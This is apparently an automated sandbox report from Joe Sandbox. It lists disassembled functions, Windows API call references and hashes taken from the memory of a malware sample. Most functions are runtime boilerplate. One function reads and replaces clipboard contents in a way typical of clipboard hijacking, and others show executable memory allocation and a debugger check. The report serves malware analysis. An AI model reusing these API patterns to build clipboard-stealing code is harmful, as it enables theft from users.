Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: Exception@8Throw
String ID:
API String ID: 2005118841-0
Opcode ID: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
Instruction ID: a93cbdcc7b8cec239d3e65b0583cf012edeaa99edf8fc6fd77b2b60b17382ec4
Opcode Fuzzy Hash: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
Instruction Fuzzy Hash: 58E09B3450430E76CB1476A5FC1595D376C6A00354B904237BC28654D1DF78F59D858D

Function 0043CD0A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95

Function 009EA14D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 009EA19E

Memory Dump Source

Source File: 00000000.00000002.4130543835.00000000009E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 009E9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e9000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: c66c3f7f5a0eb7e97ad42b26b22c83a6a5635da99728e3917911aedc97f19ae2
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: C2113C79A00208EFDB01DF99C985E98BBF5AF48351F058094F9489B362D371EE50EF81

Non-executed Functions

Function 02471942 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 151clipboardsleepmemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0247194D
Sleep.KERNEL32(00001541), ref: 02471957

Part of subcall function 0247CE77: _strlen.LIBCMT ref: 0247CE8E

OpenClipboard.USER32(00000000), ref: 02471984
GetClipboardData.USER32(00000001), ref: 02471994
_strlen.LIBCMT ref: 024719B0
_strlen.LIBCMT ref: 024719DF
_strlen.LIBCMT ref: 02471B23
EmptyClipboard.USER32 ref: 02471B39
GlobalAlloc.KERNEL32(00000002,00000001), ref: 02471B46
GlobalUnlock.KERNEL32(00000000), ref: 02471B70
SetClipboardData.USER32(00000001,00000000), ref: 02471B79
GlobalFree.KERNEL32(00000000), ref: 02471B80
CloseClipboard.USER32 ref: 02471BA4
Sleep.KERNEL32(000002D2), ref: 02471BAF

Strings

4#E, xrefs: 0247195D
i, xrefs: 024719C0

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
String ID: 4#E$i
API String ID: 4246938166-2480119546
Opcode ID: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
Instruction ID: 298b8b0c4fbb2f95e2a549cbd02ea28dd9dae5447529ee76f9fe55d805f2df1f
Opcode Fuzzy Hash: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
Instruction Fuzzy Hash: 50512430C00794DAE7119FA4ED45BED7B74FF2A306F04522AD809A2172EB709685CB69

Function 02472361 Relevance: 22.7, APIs: 15, Instructions: 205nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 0247239C
GetClientRect.USER32(?,?), ref: 024723B1
GetDC.USER32(?), ref: 024723B8
CreateSolidBrush.GDI32(00646464), ref: 024723CB
CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 024723EA
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0247240B
GetDeviceCaps.GDI32(00000000,0000005A), ref: 02472416
MulDiv.KERNEL32(00000008,00000000), ref: 0247241F
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 02472443
SetBkMode.GDI32(?,00000001), ref: 024724CE
_wcslen.LIBCMT ref: 024724E6

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
String ID:
API String ID: 1529870607-0
Opcode ID: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
Instruction ID: 472f69582a65b026421a699589cae298f55ecf5e302f3a7551bcf3816fd69b57
Opcode Fuzzy Hash: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
Instruction Fuzzy Hash: 7571ED72900228AFDB62DF64DD85FAEBBBCEB09751F0041A5F509E6155DA70AF84CF20

Function 0043B76E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B807
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B830
GetACP.KERNEL32(?,?,0043BA8D,?,00000000), ref: 0043B845

Strings

OCP, xrefs: 0043B7C2
ACP, xrefs: 0043B78C

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction ID: fa2a6f3f06b8257a5ac591d998b536fc1da73be0d13f1331aa64b533421ee897
Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction Fuzzy Hash: 4B21A136A00104AAD738DF14C801B9777AAEF98F50F669466EB0AD7311E736DE41C7D8

Function 024AB9D5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,024ABCF4,?,00000000), ref: 024ABA6E
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,024ABCF4,?,00000000), ref: 024ABA97
GetACP.KERNEL32(?,?,024ABCF4,?,00000000), ref: 024ABAAC

Strings

OCP, xrefs: 024ABA29
ACP, xrefs: 024AB9F3

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction ID: ed2214ac0c159f1f5d33b7d022289b03c00b33e6c91c490dd3f30d079a01211e
Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction Fuzzy Hash: A6217132701105AAEB348F54D921BA777A6EB74E5CB56C166E90BDB310F732DE81C390

Function 0043B942 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA4E
IsValidCodePage.KERNEL32(00000000), ref: 0043BAA9
IsValidLocale.KERNEL32(?,00000001), ref: 0043BAB8
GetLocaleInfoW.KERNEL32(?,00001001,004307B5,00000040,?,004308D5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB00
GetLocaleInfoW.KERNEL32(?,00001002,00430835,00000040), ref: 0043BB1F

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
String ID:
API String ID: 2287132625-0
Opcode ID: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
Instruction ID: d022b458b050368e3858f313ea430915e0084ddf9245bc07a5b1b9775f8f1cbc
Opcode Fuzzy Hash: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
Instruction Fuzzy Hash: E1516171A006059BEB10EFA5CC45BBF73B8FF4C701F14556BEA14E7290E7789A048BA9

Function 024ABBA9 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024A2141: GetLastError.KERNEL32(?,?,0249A9EC,?,00000000,?,0249CDE6,0247247E,00000000,?,00451F20), ref: 024A2145
Part of subcall function 024A2141: _free.LIBCMT ref: 024A2178
Part of subcall function 024A2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21B9

Part of subcall function 024A2141: _free.LIBCMT ref: 024A21A0
Part of subcall function 024A2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21AD

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 024ABCB5
IsValidCodePage.KERNEL32(00000000), ref: 024ABD10
IsValidLocale.KERNEL32(?,00000001), ref: 024ABD1F
GetLocaleInfoW.KERNEL32(?,00001001,024A0A1C,00000040,?,024A0B3C,00000055,00000000,?,?,00000055,00000000), ref: 024ABD67
GetLocaleInfoW.KERNEL32(?,00001002,024A0A9C,00000040), ref: 024ABD86

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
String ID:
API String ID: 2287132625-0
Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
Instruction ID: f39d98138fc9caf841d53f0a252733b97d08d496ac0f154d6704bd27d57516a5
Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
Instruction Fuzzy Hash: E3518071900209ABEB11DFA5DC54EBB77B9FF35708F04042FE904EB290EB719A458B61

Function 0042EAE0 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMON

Download Yara Rule

Strings

C, xrefs: 0042EAFD, 0042ECA8, 0042EECC, 0042EE66, 0042ECF6, 0042EC84
C, xrefs: 0042EF48, 0042ED32, 0042EBC1

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID:
String ID: C$C
API String ID: 0-238425240
Opcode ID: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
Instruction ID: c20898a9e1ba257a9a920a277c678998c6649ecb9dd7e2fb432374692491c933
Opcode Fuzzy Hash: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
Instruction Fuzzy Hash: D2025C71E002299BDF14CFAAD9806AEBBF1EF88314F65416AD919E7380D734A9418B94

Function 0043B00A Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307BC,?,?,?,?,00430213,?,00000004), ref: 0043B0EC
_wcschr.LIBVCRUNTIME ref: 0043B17C
_wcschr.LIBVCRUNTIME ref: 0043B18A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307BC,00000000,004308DC), ref: 0043B22D

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
String ID:
API String ID: 2444527052-0
Opcode ID: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
Instruction ID: 51baba79e9d53baeee2bb674299bb26a4ab80324ce8bdae5682f18c88f981068
Opcode Fuzzy Hash: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
Instruction Fuzzy Hash: 2A611871600305AADB25AB35DC46FAB73A8EF0C754F14142FFA15D7281EB78E90087E9

Function 024AB271 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024A2141: GetLastError.KERNEL32(?,?,0249A9EC,?,00000000,?,0249CDE6,0247247E,00000000,?,00451F20), ref: 024A2145
Part of subcall function 024A2141: _free.LIBCMT ref: 024A2178
Part of subcall function 024A2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21B9

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,024A0A23,?,?,?,?,024A047A,?,00000004), ref: 024AB353
_wcschr.LIBVCRUNTIME ref: 024AB3E3
_wcschr.LIBVCRUNTIME ref: 024AB3F1
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,024A0A23,00000000,024A0B43), ref: 024AB494

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
String ID:
API String ID: 2444527052-0
Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
Instruction ID: 11f06087d66e941983c32c890548f9314098312aa69c78252939f7d3e4083064
Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
Instruction Fuzzy Hash: AC61D672600306AAEB25AB75DC65BBB73A9EF34718F14442FE905DB280EB74D541CBA0

Function 0043B3F5 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B449
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B49A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B55A

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: ErrorInfoLastLocale$_free
String ID:
API String ID: 2834031935-0
Opcode ID: cf5f19ddaecfef394eb322faebabd4fba94275e162a49705b2643b4bebb04734
Instruction ID: c49451ec2ca19e0a4411bfa9fc43b71b3add14360d4f89f5b475bf5440394a21
Opcode Fuzzy Hash: cf5f19ddaecfef394eb322faebabd4fba94275e162a49705b2643b4bebb04734
Instruction Fuzzy Hash: D561A771501207AFEB289F25CC82BBA77A8EF08714F10507BEE05CA681E77DD951CB99

Function 0042A3D3 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4CB
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4D5
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4E2

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
Instruction ID: 57e1c3994b5eabbb9df0cdc6b85fdffdc982c490f91e1a39e2279c764f1972c3
Opcode Fuzzy Hash: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
Instruction Fuzzy Hash: C231D6749112289BCB21DF64D9887CDB7B8BF08710F5042EAE81CA7250EB749F958F49

Function 0249A63A Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,0247DAD7), ref: 0249A732
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0247DAD7), ref: 0249A73C
UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0247DAD7), ref: 0249A749

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
Instruction ID: 0b2e93ba2950da1c8cccccb63699f4fe7742ba26b32d44f259996fcecca0737f
Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
Instruction Fuzzy Hash: E531C47491132C9BCB21EF65D98879DBBB8BF08710F5042EAE41CA7260E7349F858F45

Function 0042FE5F Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE80
TerminateProcess.KERNEL32(00000000,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE87
ExitProcess.KERNEL32 ref: 0042FE99

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction ID: 8c82726c098bb25b52c6af08a7b8273a11ccbc153eb778ed9611e77f52f83783
Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction Fuzzy Hash: B3E04635100148ABCF126F50ED08A5A3B39FF09B56F810439F8068B236CB39EE42CA88

Function 024A00C6 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,024A009C,00000000,00457970,0000000C,024A01F3,00000000,00000002,00000000), ref: 024A00E7
TerminateProcess.KERNEL32(00000000,?,024A009C,00000000,00457970,0000000C,024A01F3,00000000,00000002,00000000), ref: 024A00EE
ExitProcess.KERNEL32 ref: 024A0100

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction ID: a3fff2fd7053afa5b0704e78949c652652a7e07a9cad83244e716aa3a97a675d
Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction Fuzzy Hash: D4E04635000148ABCF126F54DD18B493B6AEB12B42F008029F9048B270CB36DA42DE40

Function 0247092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

l, xrefs: 02470966
., xrefs: 0247095F
GetProcAddress., xrefs: 024709DC, 024709DF, 024709E4

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 2ba03358afb4aa586080315134d9a6fa806d0697afe7ce4ec3d947c4ea805d1a
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: AB3147B6911609DFDB10CF99C880AEEBBF9FF48324F15504AD851A7310D771EA45CBA4

Function 004351C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430213,?,00000004), ref: 00435213

Strings

GetLocaleInfoEx, xrefs: 004351D1, 004351DB

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
Instruction ID: 6c622d5e0ad0a6d1c05e93c1424bc95a701370efe176ef79413d4e55be9de99b
Opcode Fuzzy Hash: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
Instruction Fuzzy Hash: 97F02B31680318BBDB016F51CC02F6F7B21EF18B02F10006BFC0567290DA799E20AADE

Function 0249ED47 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
Instruction ID: 0e7d969b980ba6dfd04e8a54758ca7fe4a2fce6f8c0d4c53bda4dffab6b2fe6b
Opcode Fuzzy Hash: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
Instruction Fuzzy Hash: E3021A71E002199BDF14CFA9C9806AEBBF5EF88314F25826AD919E7384D731A945CF80

Function 02472605 Relevance: 3.1, APIs: 2, Instructions: 125nativewindowCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 0247262C
PostQuitMessage.USER32(00000000), ref: 024727CA

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: MessageNtdllPostProc_QuitWindow
String ID:
API String ID: 4264772764-0
Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction ID: 87c017268568291181d22e74da28774018b180f19e1a84941c1995f0bc980cca
Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction Fuzzy Hash: E941412596438095E730FFA5BC45B6633B0FF64B22F10252BD528CB2B2E3B28540C75E

Function 00436CBF Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CBA,?,?,00000008,?,?,0043F17B,00000000), ref: 00436EEC

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction ID: 64e3da0580c1687aacde15a9aed21cd267913b72937e2db5c37d982a735c0e1f
Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction Fuzzy Hash: 69B17D35210609EFD714CF28C48AB657BE0FF09324F26D659E899CF2A1C339E992CB44

Function 024A6F26 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,024A6F21,?,?,00000008,?,?,024AF3E2,00000000), ref: 024A7153

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction ID: b4bead52b7adc43ab3d09d59a5431fe39278b2192eb71e8ab72593d9b896b60c
Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction Fuzzy Hash: 7DB16F312106089FD725CF28C496B69BBE1FF55368F298659E89ACF3A1C335D992CF40

Function 0043B645 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B699

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

